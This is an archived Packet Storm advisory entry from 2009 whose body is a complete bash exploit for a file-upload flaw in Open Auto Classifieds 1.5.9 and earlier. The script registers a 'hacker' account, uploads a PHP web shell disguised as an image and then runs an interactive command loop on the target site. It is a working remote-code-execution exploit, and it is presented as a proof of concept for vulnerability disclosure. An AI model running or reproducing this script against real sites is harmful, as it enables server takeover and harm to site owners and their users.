Open Auto Classifieds 1.5.9 File Upload

2009-08-26T00:00:00
ID PACKETSTORM:80697
Type packetstorm
Reporter Andrew Horton (urbanadventurer)
Modified 2009-08-26T00:00:00

Description

                                        
                                            `#!/bin/bash  
# File Upload exploit for Open Auto Classifieds version <= 1.5.9  
#   
# Researched by Andrew Horton (urbanadventurer)  
# (c) MorningStar Security, 2009 http://www.morningstarsecurity.com/  
  
if [ -z "$1" ]; then  
echo "Usage: $0 <target-url>"  
echo "File upload proof of concept exploit for Open Auto Classifieds <= v 1.5.9"  
echo "This will create a user with the name 'hacker' and pass '31337' then upload a command execution shell."  
echo -e "eg. $0 http://www.myweb.com/cardealer/\n"  
exit  
fi  
target="$1"  
  
echo "<? print passthru(\$_REQUEST['cmd']); ?>" > evilimage.jpg.php   
  
echo "Registering user"  
curl -c cookiejar -d "user=hacker&pass=31337&email=foo%40bar.com&company_name=&first_name=Hack&last_name=Errr&phone=123+123+1234&alt_phone=&fax=&country=1&state=Badakhshan&city=&address=&zip=&submit=Submit&agree=agree" "$target/register.php" >/dev/null 2>&1  
echo "Login"  
curl -b cookiejar -c cookiejar -d "user=hacker&pass=31337&submit=Login" "$target/login.php" >/dev/null 2>&1  
echo "Upload command shell as user image"  
curl -b cookiejar -c cookiejar -F "image=@evilimage.jpg.php" -F "max=524288" -F "addimage=Submit" "$target/useredit.php" >/dev/null 2>&1  
  
CODE=`curl -b cookiejar -c cookiejar "$target/member.php" 2>/dev/null | grep _thumb.jpg | egrep -o "[0-9]{4}"`  
rm -f cookiejar evilimage.jpg.php  
echo "Command shell found at : $target/images/users/hacker${CODE}evilimage.jpg.php?cmd=id"  
  
curl "$target/images/users/hacker${CODE}evilimage.jpg.php?cmd=id" 2>/dev/null  
while read cmd; do  
curl -d "cmd=$cmd" "$target/images/users/hacker${CODE}evilimage.jpg.php" 2>/dev/null  
done  
  
`